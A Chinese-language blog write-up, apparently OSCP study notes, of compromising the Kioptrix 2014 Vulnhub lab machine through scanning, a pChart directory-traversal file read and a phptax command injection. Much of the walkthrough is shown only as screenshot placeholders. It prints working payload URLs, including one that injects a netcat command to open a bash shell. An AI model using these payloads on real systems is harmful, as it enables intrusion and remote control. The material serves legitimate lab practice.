EthanDoctor

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

Ethan医生8个月前靶场257
名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.167

信息收集

arp-scan

image.png


nmap

image.png

80端口访问


image.png

image.png


8080端口限制访问


image.png


查看F12发现head里面 出现pChart2.1.3/index.php

image.png


http://192.168.233.172/pChart2.1.3/examples/index.php 访问看看

image.png


使用searchsploit 看看有没有pchart漏洞


image.png

cat /usr/share/exploitdb/exploits/php/webapps/31173.txt查看

image.png

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image.png


这样就可以看8080端口出现啥限制

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

image.png

可以接收 env=Mozilla4_browser



image.png


image.png


固定修改UA头

谷歌phptax exploit,发现一个rce

https://www.exploit-db.com/exploits/21665



http://192.168.233.172/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make



内核提权






























标签: OSCP
返回列表

上一篇:OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

下一篇:OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

相关文章

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号